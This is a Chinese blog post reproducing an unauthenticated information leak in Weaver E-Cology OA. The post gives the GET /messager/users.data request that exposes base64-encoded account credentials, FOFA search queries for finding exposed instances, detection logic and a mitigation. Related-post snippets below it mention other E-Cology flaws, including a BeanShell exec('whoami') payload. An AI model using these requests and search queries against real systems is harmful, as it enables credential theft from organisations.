泛微OA E-Cology /messager/users.data 信息泄漏漏洞

最新推荐文章于 2025-07-06 01:07:57 发布
最新推荐文章于 2025-07-06 01:07:57 发布
阅读量704 收藏
点赞数
CC 4.0 BY-SA版权
分类专栏: 漏洞复现2025专题 文章标签: 安全 web安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/shelter1234567/article/details/145522022

泛微OA E-Cology /messager/users.data 信息泄漏漏洞

漏洞描述

泛微OA E-Cology users.data 允许任意用户下载,获取OA中的敏感信息如账号密码。

威胁等级: 高危

漏洞分类: 信息泄露

涉及厂商及产品:上海泛微网络科技股份有限公司:泛微e-Cology

应用指纹及检出思路

存在二次开发的可能

匹配源代码接口 存在关键字ecology 即可

fofa:app="泛微-协同办公OA"

icon: icon_hash="1578525679"

漏洞复现

GET /messager/users.data HTTP/1.1
Host:

base64 GBK解码

检测思路

状态码:200

对body体进行base64解码后匹配

contains(base64_decode(body),"") &&

contains(base64_decode(body),"")

修复建议

设置访问控制策略,禁用此接口

漏洞复现】OA E-Cology users.data信息泄露漏洞
晚风不及你
05-14 1242
OA E-Cology users.data存在敏感信息泄露漏洞,攻击者利用此漏洞可以获取系统敏感信息
漏洞复现】CERIO DT系列路由器 远程代码执行漏洞
qq_67810151的博客
03-13 650
CERIO DT系列路由器在特定版本中存在操作命令注入漏洞。未授权的攻击者可利用该漏洞进行远程代码执行,从而控制服务器。
漏洞复现】ecology OA系统某接口存在数据库配置信息泄露漏洞
Summer's blog
05-13 1万+
ecology OA系统某接口存在数据库配置信息泄露漏洞,复现的时候踩到的那些坑!经验分享与总结。
php越权执行命令漏洞_OA系统多版本存在命令执行漏洞
weixin_35327395的博客
03-09 1300
0x01协同商务软件系统存在命令执行0x02 漏洞危害0x03 影响范围 e-cology<=9.00x04 漏洞复现访问http://url/weaver/bsh.servlet.BshServlet输入 payload 如下:0x05 poc漏洞路径:/weaver/bsh.servlet.BshServletexec("whoami")curlhttp://xx.xx.x...
e-cology remarkOperate远程命令执行漏洞
最新发布
murphysec的博客
07-06 390
e-cology协同管理平台存在高危远程命令执行漏洞,因/api/workflow/reqform/remarkOperate接口的multipart类型参数requestid未校验直接拼接SQL,导致SQL注入。攻击者可执行任意SQL,甚至写文件实现远程命令执行,影响所有版本。建议立即限制接口访问、配置WAF过滤、验证参数输入,并通过官方渠道获取补丁修复。
2021-OA V8 SQL注入漏洞
weixin_43227251的博客
04-13 1万+
OA V8 SQL注入漏洞 漏洞描述 OA V8 存在SQL注入漏洞,攻击者可以通过漏洞获取管理员权限和服务器权限 漏洞影响 OA V8 FOFA app=“-协同办公OA漏洞复现 在getdata.jsp中,直接将request对象交给 weaver.hrm.common.AjaxManager.getData(HttpServletRequest, ServletContext) : 方法处理 在getData方法中,判断请求里cmd参数是否为空,如果不为空,调用proc方法 P
漏洞披露--OA
无问社区的博客
01-17 252
数字化运营管理平台OA为组织提供从“可信数字身份、电子化流程审批、个性化岗位信息门户、 知识文档管理、电子化签署到内外协同的业务管理”信呼OA办公系统存在SQL注入漏洞,攻击者可利用该漏洞获取数据库敏感信息。建议升级到最新版本已修复。
漏洞复现】OA E-Office do_excel.php 任意文件写入漏洞
qq_48368964的博客
10-01 1619
OAE-Ofice do exce.php 口存在任意文件写入漏洞。由于该接口未对上传文件的路径和名称进行有效校验,攻击者可以通过构造特定的请求,将任意文件写入到服务器的指定位置。攻击者利用该漏洞上传恶意文件,如 WebShel 或系统脚本,从而在服务器上执行任意命令,访问敏感数据,甚至完全接管服务器。0-0fice是一款标准化的协同 OA办公软件,协同办公产品系列成员之一,实行通用化产品设计,充分贴合企业管理需求,本着简洁易用、高效智能的原则,为企业快速打造移动化、无纸化、数字化的办公平台。
OA e-cology8最新h5补丁
06-01
综合以上信息,这个H5补丁的发布对于OA e-cology8的用户来说是一个重要的更新,它不仅提高了系统的安全性,还优化了在现代浏览器和移动设备上的表现,使用户能够享受到更流畅、更安全的办公体验。对于IT管理员而...
漏洞复现】OA E-Cology ln.FileDownload文件读取漏洞
晚风不及你
05-13 1259
OA E-Cology是一款面向中大型组织的数字化办公产品,它基于全新的设计理念和管理思想,旨在为中大型组织创建一个全新的高效协同办公环境。OA E-Cology ln.FileDownload存在任意文件读取漏洞,允许未经授权的用户读取服务器上的敏感配置文件。Fofa-Query: app="-OA(e-cology)"1.OA E-Cology。2.漏洞POC详情见公众号文章。
漏洞复现】OA E-Cology GetLabelByModule SQL注入漏洞
晚风不及你
05-16 1444
OA E-Cology getLabelByModule存在SQL注入漏洞,允许攻击者非法访问和操作数据库,可能导致数据泄露、篡改、删除,甚至控制整个服务器。
e-cology OA Beanshell组件远程代码执行漏洞批量检测脚本
09-26
对2019年9月新爆的e-cology OA Beanshell组件远程代码执行漏洞进行漏洞检测。 使用方法: 1、运行url存活检测脚本e-cology_OA_rce.py批量定位OA业务。 e-cology_OA_rce.py –t 1.txt 2、运行检测脚本判断是否可以拿权限。oa_check.py http://ip:port whoami
OA-SQL注入漏洞
maverickpig的博客
01-23 9019
OA sql注入汇总
【nday】复现OA e-cology XXE 漏洞——可读取任意文件
记录并分享学习安全的知识点..
07-14 3393
e-cology是一款由网络科技开发的协同管理平台,支持人力资源、财务、行政等多功能管理和移动办公。e-cology某处功能点最初针对用户输入的过滤不太完善,导致在处理用户输入时可触发XXE。后续修复规则依旧可被绕过,本次漏洞即为之前修复规则的绕过。攻击者可利用该漏洞列目录、读取文件,甚至可能获取应用系统的管理员权限。
【nday】OA E-Cology VerifyQuickLogin.jsp 任意管理员登录漏洞
伏一
05-23 867
app="-协同办公OA"OA E-Cology
OA后台远程代码执行漏洞
Ha1ey的博客
12-19 778
OA代码审计
OA V8 SQL注入漏洞和文件上传漏洞
热门推荐
qq_52469895的博客
04-11 1万+
fofa语句 app="-协同办公OA" SQL注入 在OA V8中的getdata.jsp文件里,通过gatData方法将数据获取并回显在页面上,而在getData方法中,判断请求里cmd参数是否为空,如果不为空,调用proc方法。其中它存在四个参数,分别为空字符串、cmd参数值、request对象以及serverContext对象,通过对cmd参数值进行判断,当cmd值等于getSelectAllId时,再从请求中获取sql和type两个参数值,并将参数传递进getSelectAllIds
【复现】-EOfficeOA信息泄露漏洞_41
fushuang333的博客
02-06 1413
【复现】-EOfficeOA信息泄露漏洞,未授权导致一些敏感配置信息泄露,可能造成系统危害以及重要信息泄露。
漏洞复现】OA E-Cology ProcessOverRequestByXml文件读取漏洞
晚风不及你
05-13 1081
OA E-Cology ProcessOverRequestByXml存在任意文件读取漏洞,允许未经授权的用户读取服务器上的敏感配置文件
OA E-cology系统数据字典详解
OA E-cology网络科技股份有限公司推出的一款企业级协同办公平台,它提供了一系列办公自动化(OA)的解决方案,旨在帮助企业和组织实现高效协同工作和信息管理。OA E-cology数据字典是该系统中用于定义、...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

昵称还在想呢

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值